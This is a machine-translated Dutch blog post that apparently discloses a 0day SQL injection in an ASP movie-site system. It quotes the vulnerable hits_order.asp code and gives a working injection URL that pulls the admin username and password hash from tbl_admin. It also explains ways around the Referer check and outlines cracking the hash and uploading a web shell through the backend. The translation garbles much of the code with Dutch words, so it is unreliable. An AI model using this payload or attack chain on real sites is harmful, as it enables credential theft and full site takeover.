Eye-dag film systeem 0day
: St0p & My5t3ry
Gereproduceerd, gelieve de bron http://www.st0p.org
Oh, My5t3ry en komen met het gat, de officiële beheerder contact op te nemen, is geen aandacht voor mij.
Laat me eerst injecteren van het probleem
De maas in de wet bestand / p_inc / hits_order.asp
Een 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <- # Include file = ".. / P_inc / config.asp" -> <- # Include file = ".. / P_inc / function.asp" -> <- # Include file = ".. / P_inc / function_func.asp" -> <- # Include file = ".. / P_inc / openconn.asp" -> <- # Include file = ".. / P_inc / G_function.asp" -> <% Then ALS Niet ChkPost () dan G_error_page_1 reactie. Redirect G_error_page_1 ( ) reactie End () End If 'Call ChkPost de / p_inc / function.asp file () functie gebruiken om de bron-URL te detecteren url,numb ) Functie G_hitss (url, numb) Dim str str = "" & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql = "select top" & gevoelloos & "id, m_name, m_pic, m_hits, m_content van qingtiandy_movie waar m_look = 1 bestelling door m_hits aflopend, id desc" 'Ik zag het niet verdoofd, geen filter server . CreateObject ( G_RS ) Set rs = server. CreateObject (G_RS) , 1 rs. geopend sql, conn, 1, 1 i = 1 Doe de While Not rs. Eof Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", rs (0), url)) "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演:" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = de str & "de <div class=kkk1_list> <a class=bbb href=" & d_url &" title='主演:" & rs (2) & "'>" & Get_length (rs (1), "", 32) & "</ a> (" & rs (3) & ") </ div> i = i + 1 rs. MoveNext Lus G_hitss = str End Function %> G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ('<% = G_hitss (request ("url"), verzoek ("Numb"))%>') 'Hier gevoelloos filter |
Het gebruik van methoden zoals
1, kunt u direct gebruik maken van de software gesmeed Referer vindt u op het volgende adres te bereiken
Door middel van XMLHTTP gesmeed de Referer vindt u op het volgende adres implementatie
3, door JS JAVASCRIPT de controle van de bron-URL
Een
| ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. document het schrijven (<a href='/p_inc/hits_order.asp?numb=1 (select str_username van tbl_admin) als username,(select str_pass van tbl_admin) als pass,'> science fiction </ a> ") ; |
http://www.st0p.org/p_inc/hits_order.asp?numb=1 (selecteer str_username van tbl_admin) als gebruikersnaam, (selecteer str_pass van tbl_admin) als pass,
Opmerking: om te springen over de Referer de detectie kan worden door de POST, GET, de Cookie van een verscheidenheid van manieren te bereiken geïnjecteerd. . .
De toegang tot de volgende, de beheerder gebruikersnaam in de URL van de link, het wachtwoord HASH direct weergegeven uit. .
Kraak de wachtwoord hash, omdat de achtergrond kan direct bewerken het ASP-bestand, naar de achtergrond en neemt u de SHELL lijn.
Deze procedure, zijn er nog andere lacunes. Hier wordt niet gemaakt. .
171 Trackback (s)
U moet ingelogd om een reactie te plaatsen.